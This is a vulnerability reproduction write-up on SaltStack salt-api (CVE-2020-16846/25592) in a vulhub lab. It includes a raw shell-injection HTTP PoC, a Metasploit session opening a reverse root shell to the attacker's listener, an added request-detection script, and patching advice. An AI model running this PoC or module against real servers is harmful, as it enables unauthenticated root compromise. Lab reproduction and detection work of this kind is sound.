SaltStack Shell Injection (CVE-2020-16846) vulnerability reappears


I. Vulnerability overview

SaltStack is a distributed operation and maintenance system widely used in Internet-facing deployments. It has two main functions:

• A configuration management system that can keep remote nodes in a predefined state

• A distributed remote execution system for running commands and querying data on remote nodes, either individually or selected by arbitrary criteria

Combining CVE-2020-16846 and CVE-2020-25592 allows arbitrary command execution through the salt-api interface without authentication. CVE-2020-25592 lets any user invoke the SSH client without a valid token, and CVE-2020-16846 is a shell injection in that client that lets the caller run arbitrary commands. salt-api is not enabled by default, but the great majority of SaltStack users do enable it, so the risk is high.

II. Environment setup

Download the environment:

https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846

Alternatively, reply "CVE-2020-16846" to the author's public account to receive the environment download.

Start the environment: docker-compose up -d

Access the address: https://192.168.1.107:8000/

III. Vulnerability reproduction

PoC

POST /run HTTP/1.1
Host: 192.168.1.107:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/x-yaml
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b

Send the PoC

The file is touched successfully
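The request above shows the shape of the attack from the defender's side: an unauthenticated POST to /run selecting the ssh client, with shell metacharacters smuggled into ssh_priv. The following is an added detection example for this write-up; it is not code from the original post or from the SaltStack project. It assumes salt-api requests are available as (method, path, body) tuples, for example from a reverse proxy log; the sample requests and the list of checked parameters beyond ssh_priv are constructed assumptions.

```python
"""Flag salt-api /run requests matching the CVE-2020-16846 / CVE-2020-25592
pattern. Added defensive example; not code from the original post or from
SaltStack. The input format and the sample requests below are assumptions."""
import re
from urllib.parse import parse_qs

# Characters that let a value break out of the shell command line the
# vulnerable ssh client builds (the PoC above uses '|' and ';').
SHELL_META = re.compile(r"[;|&`$()<>\n]")

# ssh-client parameters checked for injection. ssh_priv is the field abused in
# the PoC; the others are included as an assumption, not taken from the page.
SUSPECT_PARAMS = ("ssh_priv", "roster", "tgt", "fun")


def analyze_request(method: str, path: str, body: str):
    """Classify one salt-api request.

    Returns (severity, reasons) where severity is:
      "none"   - not a /run call using the ssh client
      "review" - ssh client called through /run (CVE-2020-25592 allowed this
                 without a valid token, so confirm the caller authenticated)
      "alert"  - ssh client plus shell metacharacters in a checked parameter
    """
    if method.upper() != "POST" or path.rstrip("/") != "/run":
        return "none", []
    # parse_qs decodes %20 / %3b, so the check sees the same bytes the shell would
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("client") != "ssh":
        return "none", []
    reasons = ["client=ssh submitted to /run"]
    severity = "review"
    for name in SUSPECT_PARAMS:
        value = params.get(name, "")
        if SHELL_META.search(value):
            severity = "alert"
            reasons.append(f"shell metacharacter in {name}={value!r}")
    return severity, reasons


def scan(requests):
    """Run analyze_request over (method, path, body) tuples; return hits only."""
    results = []
    for index, (method, path, body) in enumerate(requests):
        severity, reasons = analyze_request(method, path, body)
        if severity != "none":
            results.append((index, severity, reasons))
    return results


# Constructed sample traffic. Request 0 carries the body from the PoC above;
# the others are benign shapes invented for contrast.
SAMPLE_REQUESTS = [
    ("POST", "/run", "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash"
                     "&ssh_priv=aaa|touch%20/tmp/success%3b"),
    ("POST", "/run", "client=local&tgt=*&fun=test.ping&username=salt&password=x&eauth=pam"),
    ("POST", "/run", "client=ssh&tgt=web1&fun=test.ping&roster=flat"
                     "&ssh_priv=/etc/salt/pki/master/ssh/salt-ssh.rsa"),
    ("GET", "/login", ""),
]

if __name__ == "__main__":
    for index, severity, reasons in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {severity.upper()} - " + "; ".join(reasons))
```

The "review" level is deliberate: a legitimate salt-ssh call through the API looks identical to the auth-bypass case in a request log, so the only way to tell them apart is to correlate the request with a successful /login for that token.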

Metasploit already includes an exploit module for this vulnerability:

exploit/linux/http/saltstack_salt_api_cmd_exec

msf6 > use exploit/linux/http/saltstack_salt_api_cmd_exec
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rport 8000
rport => 8000
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LHOST 192.168.1.117
LHOST => 192.168.1.117
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > show options

Module options (exploit/linux/http/saltstack_salt_api_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.107    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      8000             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_python_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.117    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command

msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > exploit

[*] Started reverse SSL handler on 192.168.1.117:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Auth bypass successful.
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
[*] Command shell session 2 opened (192.168.1.117:4444 -> 192.168.1.107:50332) at 2020-12-21 22:34:40 +0800

id
uid=0(root) gid=0(root) groups=0(root)

IV. Vulnerability remediation

1. Patch as soon as possible. At the time of writing the official upgrade package had not been released, so the fix must be applied manually; see the official security advisory and patch.

2. If you do not need salt-api, disable it.

Reference Documents:

www.anquanke.com/vul/id/2222…

Github.com/vulhub/vulh…

www.secpulse.com/archives/14…

Disclaimer: The tools and procedures (methods) provided by this site may be offensive in nature and are intended for security research and teaching only; use them at your own risk!

Disclaimer: Copyright belongs to the author. For commercial reprints, contact the author for authorization; for non-commercial reprints, indicate the source.

thelostworld